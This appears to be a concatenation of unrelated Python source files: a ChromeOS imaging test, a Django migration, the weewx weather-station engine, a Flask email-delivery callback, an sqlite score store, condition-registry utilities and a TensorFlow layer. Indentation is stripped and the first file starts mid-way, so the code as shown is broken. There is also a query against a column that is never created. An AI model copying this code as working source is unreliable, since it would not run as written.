self.SetupCommandMock(['usb:///dev/dummy', self.IMAGE])
self.cmd_mock.inst.Run()
self.assertTrue(mock_prompt.called)
def testSkipPromptNonRemovableDevice(self):
"""Tests that we skip the prompt for non-removable with --yes."""
with mock.patch.object(cros_build_lib, 'BooleanPrompt') as mock_prompt:
self.SetupCommandMock(['--yes', 'usb:///dev/dummy', self.IMAGE])
self.cmd_mock.inst.Run()
self.assertFalse(mock_prompt.called)
def testChooseRemovableDevice(self):
"""Tests that we ask user to choose a device if none is given."""
self.SetupCommandMock(['usb://', self.IMAGE])
self.cmd_mock.inst.Run()
self.assertTrue(self.imager_mock.patched['ChooseRemovableDevice'].called)
if __name__ == '__main__':
cros_test_lib.main()
|
# Generated by Django 3.0.8 on 2020-12-28 13:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0010_invoice_pdf_document'),
]
operations = [
migrations.AlterField(
model_name='invoice',
name='pdf_document',
field=models.FileField(blank=True, null=True, upload_to='invoice_documents/'),
),
]
|
#
# Copyright (c) 2009-2020 Tom Keffer <tkeffer@gmail.com>
#
# See the file LICENSE.txt for your full rights.
#
"""Main engine for the weewx weather system."""
# Python imports
from __future__ import absolute_import
from __future__ import print_function
import gc
import logging
import socket
import sys
import threading
import time
# weewx imports:
import weeutil.logger
import weeutil.weeutil
import weewx.accum
import weewx.manager
import weewx.qc
import weewx.station
import weewx.units
from weeutil.weeutil import to_bool, to_int, to_sorted_string
from weewx import all_service_groups
log = logging.getLogger(__name__)
class BreakLoop(Exception):
"""Exception raised when it's time to break the main loop."""
class InitializationError(weewx.WeeWxIOError):
"""Exception raised when unable to initialize the console."""
#==============================================================================
# Class StdEngine
#==============================================================================
class StdEngine(object):
"""The main engine responsible for the creating and dispatching of events
from the weather station.
It loads a set of services, specified by an option in the configuration
file.
When a service loads, it binds callbacks to events. When an event occurs,
the bound callback will be called."""
def __init__(self, config_dict):
"""Initialize an instance of StdEngine.
config_dict: The configuration dictionary. """
# Set a default socket time out, in case FTP or HTTP hang:
timeout = int(config_dict.get('socket_timeout', 20))
socket.setdefaulttimeout(timeout)
# Default garbage collection is every 3 hours:
self.gc_interval = int(config_dict.get('gc_interval', 3 * 3600))
# Set up the callback dictionary:
self.callbacks = dict()
# Set up the weather station hardware:
self.setupStation(config_dict)
# Hook for performing any chores before loading the services:
self.preLoadServices(config_dict)
# Load the services:
self.loadServices(config_dict)
# Another hook for after the services load.
self.postLoadServices(config_dict)
def setupStation(self, config_dict):
"""Set up the weather station hardware."""
# Get the hardware type from the configuration dictionary. This will be
# a string such as "VantagePro"
station_type = config_dict['Station']['station_type']
# Find the driver name for this type of hardware
driver = config_dict[station_type]['driver']
log.info("Loading station type %s (%s)", station_type, driver)
# Import the driver:
__import__(driver)
# Open up the weather station, wrapping it in a try block in case
# of failure.
try:
# This is a bit of Python wizardry. First, find the driver module
# in sys.modules.
driver_module = sys.modules[driver]
# Find the function 'loader' within the module:
loader_function = getattr(driver_module, 'loader')
# Call it with the configuration dictionary as the only argument:
self.console = loader_function(config_dict, self)
except Exception as ex:
log.error("Import of driver failed: %s (%s)", ex, type(ex))
weeutil.logger.log_traceback(log.critical, " **** ")
# Signal that we have an initialization error:
raise InitializationError(ex)
def preLoadServices(self, config_dict):
self.stn_info = weewx.station.StationInfo(self.console, **config_dict['Station'])
self.db_binder = weewx.manager.DBBinder(config_dict)
def loadServices(self, config_dict):
"""Set up the services to be run."""
# This will hold the list of objects, after the services have been
# instantiated:
self.service_obj = []
# Wrap the instantiation of the services in a try block, so if an
# exception occurs, any service that may have started can be shut
# down in an orderly way.
try:
# Go through each of the service lists one by one:
for service_group in all_service_groups:
# For each service list, retrieve all the listed services.
# Provide a default, empty list in case the service list is
# missing completely:
for svc in weeutil.weeutil.option_as_list(config_dict['Engine']['Services'].get(service_group, [])):
if svc == '':
log.debug("No services in service group %s", service_group)
continue
log.debug("Loading service %s", svc)
# Get the class, then instantiate it with self and the config dictionary as arguments:
obj = weeutil.weeutil.get_object(svc)(self,config_dict)
# Append it to the list of open services.
self.service_obj.append(obj)
log.debug("Finished loading service %s", svc)
except Exception:
# An exception occurred. Shut down any running services, then
# reraise the exception.
self.shutDown()
raise
def postLoadServices(self, config_dict):
pass
def run(self):
"""Main execution entry point."""
# Wrap the outer loop in a try block so we can do an orderly shutdown
# should an exception occur:
try:
# Send out a STARTUP event:
self.dispatchEvent(weewx.Event(weewx.STARTUP))
log.info("Starting main packet loop.")
last_gc = time.time()
# This is the outer loop.
while True:
# See if garbage collection is scheduled:
if time.time() - last_gc > self.gc_interval:
gc_start = time.time()
ngc = gc.collect()
last_gc = time.time()
gc_time = last_gc - gc_start
log.info("Garbage collected %d objects in %.2f seconds", ngc, gc_time)
# First, let any interested services know the packet LOOP is
# about to start
self.dispatchEvent(weewx.Event(weewx.PRE_LOOP))
# Get ready to enter the main packet loop. An exception of type
# BreakLoop will get thrown when a service wants to break the
# loop and interact with the console.
try:
# And this is the main packet LOOP. It will continuously
# generate LOOP packets until some service breaks it by
# throwing an exception (usually when an archive period
# has passed).
for packet in self.console.genLoopPackets():
# Package the packet as an event, then dispatch it.
self.dispatchEvent(weewx.Event(weewx.NEW_LOOP_PACKET, packet=packet))
# Allow services to break the loop by throwing
# an exception:
self.dispatchEvent(weewx.Event(weewx.CHECK_LOOP, packet=packet))
log.critical("Internal error. Packet loop has exited.")
except BreakLoop:
# Send out an event saying the packet LOOP is done:
self.dispatchEvent(weewx.Event(weewx.POST_LOOP))
finally:
# The main loop has exited. Shut the engine down.
log.info("Main loop exiting. Shutting engine down.")
self.shutDown()
def bind(self, event_type, callback):
"""Binds an event to a callback function."""
# Each event type has a list of callback functions to be called.
# If we have not seen the event type yet, then create an empty list,
# otherwise append to the existing list:
self.callbacks.setdefault(event_type, []).append(callback)
def dispatchEvent(self, event):
"""Call all registered callbacks for an event."""
# See if any callbacks have been registered for this event type:
if event.event_type in self.callbacks:
# Yes, at least one has been registered. Call them in order:
for callback in self.callbacks[event.event_type]:
# Call the function with the event as an argument:
callback(event)
def shutDown(self):
"""Run when an engine shutdown is requested."""
# If we've gotten as far as having a list of service objects, then shut
# them all down:
if hasattr(self, 'service_obj'):
while len(self.service_obj):
# Wrap each individual service shutdown, in case of a problem.
try:
# Start from the end of the list and move forward
self.service_obj[-1].shutDown()
except:
pass
# Delete the actual service
del self.service_obj[-1]
del self.service_obj
try:
del self.callbacks
except AttributeError:
pass
try:
# Close the console:
self.console.closePort()
del self.console
except:
pass
try:
self.db_binder.close()
del self.db_binder
except:
pass
def _get_console_time(self):
try:
return self.console.getTime()
except NotImplementedError:
return int(time.time() + 0.5)
#==============================================================================
# Class StdService
#==============================================================================
class StdService(object):
"""Abstract base class for all services."""
def __init__(self, engine, config_dict):
self.engine = engine
self.config_dict = config_dict
def bind(self, event_type, callback):
"""Bind the specified event to a callback."""
# Just forward the request to the main engine:
self.engine.bind(event_type, callback)
def shutDown(self):
pass
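# A minimal custom service sketch (illustrative only; the class name and the
# log message are made up and are not part of this codebase). It shows the
# bind/callback pattern described in the StdEngine docstring above:
#
#   class MyLoggingService(StdService):
#       def __init__(self, engine, config_dict):
#           super(MyLoggingService, self).__init__(engine, config_dict)
#           self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
#
#       def new_archive_record(self, event):
#           log.info("New archive record at %s", event.record['dateTime'])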
#==============================================================================
# Class StdConvert
#==============================================================================
class StdConvert(StdService):
"""Service for performing unit conversions.
This service acts as a filter. Whatever packets and records come in are
converted to a target unit system.
This service should be run before most of the others, so observations appear
in the correct unit."""
def __init__(self, engine, config_dict):
# Initialize my base class:
super(StdConvert, self).__init__(engine, config_dict)
# Get the target unit nickname (something like 'US' or 'METRIC'):
target_unit_nickname = config_dict['StdConvert']['target_unit']
# Get the target unit: weewx.US, weewx.METRIC, weewx.METRICWX
self.target_unit = weewx.units.unit_constants[target_unit_nickname.upper()]
# Bind self.converter to the appropriate standard converter
self.converter = weewx.units.StdUnitConverters[self.target_unit]
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
log.info("StdConvert target unit is 0x%x", self.target_unit)
def new_loop_packet(self, event):
"""Do unit conversions for a LOOP packet"""
# No need to do anything if the packet is already in the target
# unit system
if event.packet['usUnits'] == self.target_unit:
return
# Perform the conversion
converted_packet = self.converter.convertDict(event.packet)
# Add the new unit system
converted_packet['usUnits'] = self.target_unit
# Replace the old packet with the new, converted packet:
event.packet = converted_packet
def new_archive_record(self, event):
"""Do unit conversions for an archive record."""
# No need to do anything if the record is already in the target
# unit system
if event.record['usUnits'] == self.target_unit:
return
# Perform the conversion
converted_record = self.converter.convertDict(event.record)
# Add the new unit system
converted_record['usUnits'] = self.target_unit
# Replace the old record with the new, converted record
event.record = converted_record
#==============================================================================
# Class StdCalibrate
#==============================================================================
class StdCalibrate(StdService):
"""Adjust data using calibration expressions.
This service must be run before StdArchive, so the correction is applied
before the data is archived."""
def __init__(self, engine, config_dict):
# Initialize my base class:
super(StdCalibrate, self).__init__(engine, config_dict)
# Get the list of calibration corrections to apply. If a section
# is missing, a KeyError exception will get thrown:
try:
correction_dict = config_dict['StdCalibrate']['Corrections']
self.corrections = {}
# For each correction, compile it, then save in a dictionary of
# corrections to be applied:
for obs_type in correction_dict.scalars:
self.corrections[obs_type] = compile(correction_dict[obs_type],
'StdCalibrate', 'eval')
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
except KeyError:
log.info("No calibration information in config file. Ignored.")
def new_loop_packet(self, event):
"""Apply a calibration correction to a LOOP packet"""
for obs_type in self.corrections:
if obs_type == 'foo': continue
try:
event.packet[obs_type] = eval(self.corrections[obs_type], None, event.packet)
except (TypeError, NameError):
pass
except ValueError as e:
log.error("StdCalibration loop error %s", e)
def new_archive_record(self, event):
"""Apply a calibration correction to an archive packet"""
# If the record was software generated, then any corrections have
# already been applied in the LOOP packet.
if event.origin != 'software':
for obs_type in self.corrections:
if obs_type == 'foo': continue
try:
event.record[obs_type] = eval(self.corrections[obs_type], None, event.record)
except (TypeError, NameError):
pass
except ValueError as e:
log.error("StdCalibration archive error %s", e)
#==============================================================================
# Class StdQC
#==============================================================================
class StdQC(StdService):
"""Service that performs quality check on incoming data.
A StdService wrapper for a QC object so it may be called as a service. This
also allows the weewx.qc.QC class to be used elsewhere without the
overheads of running it as a weewx service.
"""
def __init__(self, engine, config_dict):
super(StdQC, self).__init__(engine, config_dict)
# Get a QC object to apply the QC checks to our data
self.qc = weewx.qc.QC(config_dict)
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
def new_loop_packet(self, event):
"""Apply quality check to the data in a loop packet"""
self.qc.apply_qc(event.packet, 'LOOP')
def new_archive_record(self, event):
"""Apply quality check to the data in an archive record"""
self.qc.apply_qc(event.record, 'Archive')
#==============================================================================
# Class StdArchive
#==============================================================================
class StdArchive(StdService):
"""Service that archives LOOP and archive data in the SQL databases."""
# This service manages an "accumulator", which records high/lows and
# averages of LOOP packets over an archive period. At the end of the
# archive period it then emits an archive record.
def __init__(self, engine, config_dict):
super(StdArchive, self).__init__(engine, config_dict)
# Extract the various options from the config file. If it's missing, fill in with defaults:
if 'StdArchive' in config_dict:
self.data_binding = config_dict['StdArchive'].get('data_binding', 'wx_binding')
self.record_generation = config_dict['StdArchive'].get('record_generation', 'hardware').lower()
self.no_catchup = to_bool(config_dict['StdArchive'].get('no_catchup', False))
self.archive_delay = to_int(config_dict['StdArchive'].get('archive_delay', 15))
software_interval = to_int(config_dict['StdArchive'].get('archive_interval', 300))
self.loop_hilo = to_bool(config_dict['StdArchive'].get('loop_hilo', True))
self.record_augmentation = to_bool(config_dict['StdArchive'].get('record_augmentation', True))
else:
self.data_binding = 'wx_binding'
self.record_generation = 'hardware'
self.no_catchup = False
self.archive_delay = 15
software_interval = 300
self.loop_hilo = True
self.record_augmentation = True
log.info("Archive will use data binding %s", self.data_binding)
log.info("Record generation will be attempted in '%s'", self.record_generation)
if self.record_generation == 'software':
self.archive_interval = software_interval
ival_msg = "(software record generation)"
elif self.record_generation == 'hardware':
# If the station supports a hardware archive interval, use that.
# Warn if it is different than what is in config.
try:
if software_interval != self.engine.console.archive_interval:
log.error("The archive interval in the"
" configuration file (%d) does not match the"
" station hardware interval (%d).",
software_interval,
self.engine.console.archive_interval)
self.archive_interval = self.engine.console.archive_interval
ival_msg = "(specified by hardware)"
except NotImplementedError:
self.archive_interval = software_interval
ival_msg = "(specified in weewx configuration)"
else:
log.error("Unknown type of record generation: %s", self.record_generation)
raise ValueError(self.record_generation)
log.info("Using archive interval of %d seconds %s", self.archive_interval, ival_msg)
if self.archive_delay <= 0:
raise weewx.ViolatedPrecondition("Archive delay (%.1f) must be greater than zero." %
(self.archive_delay,))
if self.archive_delay >= self.archive_interval / 2:
log.warning("Archive delay (%d) is unusually long", self.archive_delay)
log.debug("Use LOOP data in hi/low calculations: %d", self.loop_hilo)
weewx.accum.initialize(config_dict)
self.old_accumulator = None
self.bind(weewx.STARTUP, self.startup)
self.bind(weewx.PRE_LOOP, self.pre_loop)
self.bind(weewx.POST_LOOP, self.post_loop)
self.bind(weewx.CHECK_LOOP, self.check_loop)
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
def startup(self, _event):
"""Called when the engine is starting up. Main task is to set up the database, backfill it, then
perform a catch up if the hardware supports it. """
# This will create the database if it doesn't exist:
dbmanager = self.engine.db_binder.get_manager(self.data_binding, initialize=True)
log.info("Using binding '%s' to database '%s'", self.data_binding, dbmanager.database_name)
# Make sure the daily summaries have not been partially updated
if dbmanager._read_metadata('lastWeightPatch'):
raise weewx.ViolatedPrecondition("Update of daily summary for database '%s' not complete. "
"Finish the update first." % dbmanager.database_name)
# Back fill the daily summaries.
_nrecs, _ndays = dbmanager.backfill_day_summary()
# Do a catch up on any data still on the station, but not yet put in the database.
if self.no_catchup:
log.debug("No catchup specified.")
else:
# Not all consoles can do a hardware catchup, so be prepared to catch the exception:
try:
self._catchup(self.engine.console.genStartupRecords)
except NotImplementedError:
pass
def pre_loop(self, _event):
"""Called before the main packet loop is entered."""
# If this is the initial time through the loop, then the end of
# the archive and delay periods need to be primed:
if not hasattr(self, 'end_archive_period_ts'):
now = self.engine._get_console_time()
start_archive_period_ts = weeutil.weeutil.startOfInterval(now, self.archive_interval)
self.end_archive_period_ts = start_archive_period_ts + self.archive_interval
self.end_archive_delay_ts = self.end_archive_period_ts + self.archive_delay
self.old_accumulator = None
def new_loop_packet(self, event):
"""Called when A new LOOP record has arrived."""
# Do we have an accumulator at all? If not, create one:
if not hasattr(self, "accumulator"):
self.accumulator = self._new_accumulator(event.packet['dateTime'])
# Try adding the LOOP packet to the existing accumulator. If the
# timestamp is outside the timespan of the accumulator, an exception
# will be thrown:
try:
self.accumulator.addRecord(event.packet, add_hilo=self.loop_hilo)
except weewx.accum.OutOfSpan:
# Shuffle accumulators:
(self.old_accumulator, self.accumulator) = (self.accumulator, self._new_accumulator(event.packet['dateTime']))
# Try again:
self.accumulator.addRecord(event.packet, add_hilo=self.loop_hilo)
def check_loop(self, event):
"""Called after any loop packets have been processed. This is the opportunity
to break the main loop by throwing an exception."""
# Is this the end of the archive period? If so, dispatch an
# END_ARCHIVE_PERIOD event
if event.packet['dateTime'] > self.end_archive_period_ts:
self.engine.dispatchEvent(weewx.Event(weewx.END_ARCHIVE_PERIOD, packet=event.packet))
start_archive_period_ts = weeutil.weeutil.startOfInterval(event.packet['dateTime'], self.archive_interval)
self.end_archive_period_ts = start_archive_period_ts + self.archive_interval
# Has the archive delay period ended? If so, break the loop.
if event.packet['dateTime'] >= self.end_archive_delay_ts:
raise BreakLoop
def post_loop(self, _event):
"""The main packet loop has ended, so process the old accumulator."""
# If weewx happens to start up in the small time interval between the end of
# the archive interval and the end of the archive delay period, then
# there will be no old accumulator. Check for this.
if self.old_accumulator:
# If the user has requested software generation, then do that:
if self.record_generation == 'software':
self._software_catchup()
elif self.record_generation == 'hardware':
# Otherwise, try to honor hardware generation. An exception
# will be raised if the console does not support it. In that
# case, fall back to software generation.
try:
self._catchup(self.engine.console.genArchiveRecords)
except NotImplementedError:
self._software_catchup()
else:
raise ValueError("Unknown station record generation value %s" % self.record_generation)
self.old_accumulator = None
# Set the time of the next break loop:
self.end_archive_delay_ts = self.end_archive_period_ts + self.archive_delay
def new_archive_record(self, event):
"""Called when a new archive record has arrived.
Put it in the archive database."""
# If requested, extract any extra information we can out of the
# accumulator and put it in the record.
if self.record_augmentation and self.old_accumulator \
and event.record['dateTime'] == self.old_accumulator.timespan.stop:
self.old_accumulator.augmentRecord(event.record)
dbmanager = self.engine.db_binder.get_manager(self.data_binding)
dbmanager.addRecord(event.record, accumulator=self.old_accumulator)
def _catchup(self, generator):
"""Pull any unarchived records off the console and archive them.
If the hardware does not support hardware archives, an exception of
type NotImplementedError will be thrown."""
dbmanager = self.engine.db_binder.get_manager(self.data_binding)
# Find out when the database was last updated.
lastgood_ts = dbmanager.lastGoodStamp()
try:
# Now ask the console for any new records since then. Not all
# consoles support this feature. Note that for some consoles,
# notably the Vantage, when doing a long catchup the archive
# records may not be on the same boundaries as the archive
# interval. Reject any records that have a timestamp in the
# future, but provide some lenience for clock drift.
for record in generator(lastgood_ts):
ts = record.get('dateTime')
if ts and ts < time.time() + self.archive_delay:
self.engine.dispatchEvent(weewx.Event(weewx.NEW_ARCHIVE_RECORD,
record=record,
origin='hardware'))
else:
log.warning("ignore historical record: %s" % record)
except weewx.HardwareError as e:
log.error("Internal error detected. Catchup abandoned")
log.error("**** %s" % e)
def _software_catchup(self):
# Extract a record out of the old accumulator.
record = self.old_accumulator.getRecord()
# Add the archive interval
record['interval'] = self.archive_interval / 60
# Send out an event with the new record:
self.engine.dispatchEvent(weewx.Event(weewx.NEW_ARCHIVE_RECORD, record=record, origin='software'))
def _new_accumulator(self, timestamp):
start_ts = weeutil.weeutil.startOfInterval(timestamp,
self.archive_interval)
end_ts = start_ts + self.archive_interval
# Instantiate a new accumulator
new_accumulator = weewx.accum.Accum(weeutil.weeutil.TimeSpan(start_ts, end_ts))
return new_accumulator
#==============================================================================
# Class StdTimeSynch
#==============================================================================
class StdTimeSynch(StdService):
"""Regularly asks the station to synch up its clock."""
def __init__(self, engine, config_dict):
super(StdTimeSynch, self).__init__(engine, config_dict)
# Zero out the time of last synch, and get the time between synchs.
self.last_synch_ts = 0
self.clock_check = int(config_dict.get('StdTimeSynch', {'clock_check': 14400}).get('clock_check', 14400))
self.max_drift = int(config_dict.get('StdTimeSynch', {'max_drift': 5}).get('max_drift', 5))
self.bind(weewx.STARTUP, self.startup)
self.bind(weewx.PRE_LOOP, self.pre_loop)
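# The defaults read above correspond to a configuration fragment such as the
# following (the values shown are the built-in defaults; the section itself is
# optional and hypothetical here):
#
#   [StdTimeSynch]
#     clock_check = 14400   # seconds between clock checks
#     max_drift = 5         # maximum tolerated clock error, in seconds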
def startup(self, _event):
"""Called when the engine is starting up."""
self.do_sync()
def pre_loop(self, _event):
"""Called before the main event loop is started."""
self.do_sync()
def do_sync(self):
"""Ask the station to synch up if enough time has passed."""
# Synch up the station's clock if it's been more than clock_check
# seconds since the last check:
now_ts = time.time()
if now_ts - self.last_synch_ts >= self.clock_check:
self.last_synch_ts = now_ts
try:
console_time = self.engine.console.getTime()
if console_time is None:
return
# getTime can take a long time to run, so we use the current
# system time
diff = console_time - time.time()
log.info("Clock error is %.2f seconds (positive is fast)", diff)
if abs(diff) > self.max_drift:
try:
self.engine.console.setTime()
except NotImplementedError:
log.debug("Station does not support setting the time")
except NotImplementedError:
log.debug("Station does not support reading the time")
except weewx.WeeWxIOError as e:
log.info("Error reading time: %s" % e)
#==============================================================================
# Class StdPrint
#==============================================================================
class StdPrint(StdService):
"""Service that prints diagnostic information when a LOOP
or archive packet is received."""
def __init__(self, engine, config_dict):
super(StdPrint, self).__init__(engine, config_dict)
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
def new_loop_packet(self, event):
"""Print out the new LOOP packet"""
print("LOOP: ",
weeutil.weeutil.timestamp_to_string(event.packet['dateTime']),
to_sorted_string(event.packet))
def new_archive_record(self, event):
"""Print out the new archive record."""
print("REC: ",
weeutil.weeutil.timestamp_to_string(event.record['dateTime']),
to_sorted_string(event.record))
#==============================================================================
# Class StdReport
#==============================================================================
class StdReport(StdService):
"""Launches a separate thread to do reporting."""
def __init__(self, engine, config_dict):
super(StdReport, self).__init__(engine, config_dict)
self.max_wait = int(config_dict['StdReport'].get('max_wait', 600))
self.thread = None
self.launch_time = None
self.record = None
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
self.bind(weewx.POST_LOOP, self.launch_report_thread)
def new_archive_record(self, event):
"""Cache the archive record to pass to the report thread."""
self.record = event.record
def launch_report_thread(self, _event):
"""Called after the packet LOOP. Processes any new data."""
import weewx.reportengine
# Do not launch the reporting thread if an old one is still alive.
# To guard against a zombie thread (alive, but doing nothing) launch
# anyway if enough time has passed.
if self.thread and self.thread.is_alive():
thread_age = time.time() - self.launch_time
if thread_age < self.max_wait:
log.info("Launch of report thread aborted: existing report thread still running")
return
else:
log.warning("Previous report thread has been running"
" %s seconds. Launching report thread anyway.", thread_age)
try:
self.thread = weewx.reportengine.StdReportEngine(self.config_dict,
self.engine.stn_info,
self.record,
first_run=not self.launch_time)
self.thread.start()
self.launch_time = time.time()
except threading.ThreadError:
log.error("Unable to launch report thread.")
self.thread = None
def shutDown(self):
if self.thread:
log.info("Shutting down StdReport thread")
self.thread.join(20.0)
if self.thread.is_alive():
log.error("Unable to shut down StdReport thread")
else:
log.debug("StdReport thread has been terminated")
self.thread = None
self.launch_time = None
|
from flask import jsonify, current_app
from dmapiclient.audit import AuditTypes
from dmutils.email.helpers import hash_string
from app import db
from app.callbacks import callbacks
from app.utils import get_json_from_request
from app.models import User, AuditEvent
@callbacks.route('/')
@callbacks.route('')
def callbacks_root():
return jsonify(status='ok'), 200
@callbacks.route('/notify', methods=['POST'])
def notify_callback():
notify_data = get_json_from_request()
email_address = notify_data["to"]
hashed_email = hash_string(email_address)
reference = notify_data["reference"]
status = notify_data["status"]
# remove PII from response for logging
# according to docs only "to" has PII
# https://docs.notifications.service.gov.uk/rest-api.html#delivery-receipts
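# For reference, a delivery receipt of the shape handled here looks roughly
# like this (field values are illustrative, not real data; see the docs link
# above for the authoritative schema):
#   {"reference": "...", "to": "user@example.com", "status": "delivered", ...}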
clean_notify_data = notify_data.copy()
del clean_notify_data["to"]
current_app.logger.info(
f"Notify callback: {status}: {reference} to {hashed_email}",
extra={"notify_delivery_receipt": clean_notify_data},
)
if status == "permanent-failure":
user = User.query.filter(
User.email_address == email_address
).first()
if user and user.active:
user.active = False
db.session.add(user)
audit_event = AuditEvent(
audit_type=AuditTypes.update_user,
user='Notify callback',
data={"user": {"active": False}, "notify_callback_data": notify_data},
db_object=user,
)
db.session.add(audit_event)
db.session.commit()
current_app.logger.info(
f"User account disabled for {hashed_email} after Notify reported permanent delivery "
"failure."
)
elif status.endswith("failure"):
current_app.logger.warning(
f"Notify failed to deliver {reference} to {hashed_email}"
)
return jsonify(status='ok'), 200
|
'''
Storage helper class
MIT License
Copyright (c) 2019 Daniel Marchasin (daniel@vt77.com)
See LICENSE file
'''
import os.path
import sqlite3
import logging
logger = logging.getLogger(__name__)
dbfilename = 'data/.gamedata.db'
if not os.path.isfile(dbfilename):
with sqlite3.connect(dbfilename) as conn:
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,socialid varchar(128), name varchar(128),email varchar(128), image varchar(128),score_h integer,score_ai integer)")
conn.execute("CREATE UNIQUE INDEX index_socialid ON users(socialid)")
conn.execute("CREATE INDEX index_score ON users(score_h)")
def update_user_score(id,wins,loses):
with sqlite3.connect(dbfilename) as conn:
conn.execute("UPDATE users SET score_h=?,score_ai=? WHERE id=?",(wins,loses,id))
def update_games_count(id,count):
with sqlite3.connect(dbfilename) as conn:
conn.execute("UPDATE users SET games_count=? where id=?",(count,id))
return count
def create_user(socialid,user_data):
user_id = None
with sqlite3.connect(dbfilename) as conn:
cur = conn.execute("INSERT INTO users (socialid,name,email,image,score_h,score_ai) VALUES (?,?,?,?,0,0)", (socialid,user_data['name'],user_data['email'],user_data['image']))
user_id = cur.lastrowid
return user_id
def get_user_id(social_id):
logger.info("Getting user by SocialID %s" % social_id )
with sqlite3.connect(dbfilename) as conn:
cur = conn.execute("SELECT id,email FROM users WHERE socialid=?",[social_id])
if not cur:
logger.info("[STORAGE]User not found. ID: %s" % social_id)
return None
row = cur.fetchone()
if row is None:
return None
logger.info("[STORAGE]Found user : : %s ", row[1])
return row[0]
def get_top_scores(num):
with sqlite3.connect(dbfilename) as conn:
cur = conn.execute("SELECT name,image,score_h,score_ai FROM users order by score_h desc limit 10")
best_scores = [dict(zip(['name','image','score_h','score_ai'],list(s))) for s in cur]
return best_scores
if __name__ == '__main__':
import sys,os
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logger.addHandler( logging.StreamHandler(sys.stdout) )
print(get_top_scores(10))
|
"""
Module that provides access to the Proctor registry
of conditions.
The utility functions here could conceivably be wrapped
and exposed via a web endpoint.
All output from these utils should be json format.
"""
import logging
import serializers
from filter_set import FilterSet
from . import Proctor, ContextualCondition
log = logging.getLogger("proctor.utils")
def list_conditions():
"""List all the conditions"""
_proctor = Proctor()
return map(serializers.registered_condition, _proctor._conditions._registry.values())
def search_conditions(filters, klass=None):
"""
Search the condition registry
filters: FilterSet spec
klass: Class to prefilter results - will observe inheritance
"""
_proctor = Proctor()
condition_list = []
filter_set = FilterSet(filters)
# Get a dict of conditions
if klass:
conditions = _proctor._conditions.get_registered_conditions(klass)
else:
conditions = _proctor._conditions._registry.values()
condition_list = map(serializers.registered_condition, conditions)
return filter(filter_set.filter, condition_list)
def get_context_condition(condition_id, obj):
"""Get a condition with a context loaded"""
_proctor = Proctor()
condition = _proctor._conditions.get_condition(condition_id)
if not condition:
raise Exception("Conditions does not exist {}".format(condition_id))
return serializers.context_condition(ContextualCondition(obj, condition))
def check_condition(condition_id, obj):
"""Get the result of checking a condition on an object"""
_proctor = Proctor()
condition = _proctor._conditions.get_condition(condition_id)
if not condition:
raise Exception("Conditions does not exist {}".format(condition_id))
cond = ContextualCondition(obj, condition)
cond.detect()
return serializers.context_condition(cond)
def fix_condition(condition_id, obj):
"""Get the result of fixing a condition on an object"""
_proctor = Proctor()
condition = _proctor._conditions.get_condition(condition_id)
if not condition:
raise Exception("Conditions does not exist {}".format(condition_id))
cond = ContextualCondition(obj, condition)
cond.detect()
if cond.detected:
cond.rectify()
return serializers.context_condition(cond)
def get_context_conditions(obj, condition_filters=None):
"""
Get all conditions for an object
See search_conditions.
"""
_proctor = Proctor()
_filters = condition_filters or {}
# Get the contextual conditions
conditions = map(
lambda x: ContextualCondition(obj, _proctor._conditions.get_condition(x.pid)),
search_conditions(_filters, obj.__class__)
)
# serialize it
return map(serializers.context_condition, conditions)
def check_conditions(obj, condition_filters=None):
"""
Get the results of checking all conditions on an object
Checks only the conditions that match the condition_filters.
See search_conditions.
"""
_proctor = Proctor()
_filters = condition_filters or {}
# Get the contextual conditions
conditions = map(
lambda x: ContextualCondition(obj, _proctor._conditions.get_condition(x.pid)),
search_conditions(_filters, obj.__class__)
)
# Now go run the detector on all the conditions
for cond in conditions:
cond.detect()
# serialize it
return map(serializers.context_condition, conditions)
def fix_conditions(obj, condition_filters=None):
"""
Get the results of fixing all detected conditions on an object
Checks only the conditions that match the condition_filters.
See search_conditions.
"""
_proctor = Proctor()
_filters = condition_filters or {}
# Get the contextual conditions
conditions = map(
lambda x: ContextualCondition(obj, _proctor._conditions.get_condition(x.pid)),
search_conditions(_filters, obj.__class__)
)
# Now go run the detector on all the conditions
for cond in conditions:
cond.detect()
if cond.detected:
cond.rectify()
# serialize it
return map(serializers.context_condition, conditions)
|
class Base():
def __init__(self, filename, byte_content, entries, option_map):
# Raising a string is invalid in Python 3; raise a proper exception instead.
raise NotImplementedError('Not implemented!')
def parse(self):
pass
|
import tensorflow as tf
from tensorflow import keras
ops_module = tf.load_op_library('ops/ops.so')
class BinarizeLayer(keras.layers.Layer):
"""Binarize input probabilities via graph-cut algorithm."""
def __init__(self, gc_lambda, name=None):
super().__init__(trainable=False, name=name)
assert gc_lambda >= 0
self.gc_lambda = gc_lambda
def call(self, probs):
result = ops_module.gc_binarize(probs[0], self.gc_lambda)
return tf.expand_dims(result, axis=0)
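# Minimal usage sketch (assumes the custom op loaded above is available; the
# tensor shape and lambda value are made up for illustration only):
#
#   probs = tf.random.uniform((1, 64, 64))          # batch of probabilities
#   binary = BinarizeLayer(gc_lambda=0.5)(probs)    # graph-cut binarized output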
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from quixote.errors import TraversalError
from vilya.models.project import CodeDoubanProject
from vilya.models.comment import Comment, latest
from vilya.views.util import http_method
_q_exports = []
class CommentUI:
''' project commit comment ui '''
_q_exports = ['new']
def __init__(self, proj_name):
self.proj_name = proj_name
def _q_index(self, request):
return "Last comments list TODO" + str(latest())
@http_method(methods=['POST'])
def new(self, request):
project = CodeDoubanProject.get_by_name(self.proj_name)
user = request.user
ref = request.get_form_var('ref')
assert ref, "comment ref cannot be empty"
content = request.get_form_var('content', '')
new_comment = Comment.add(project, ref, user.name, content)
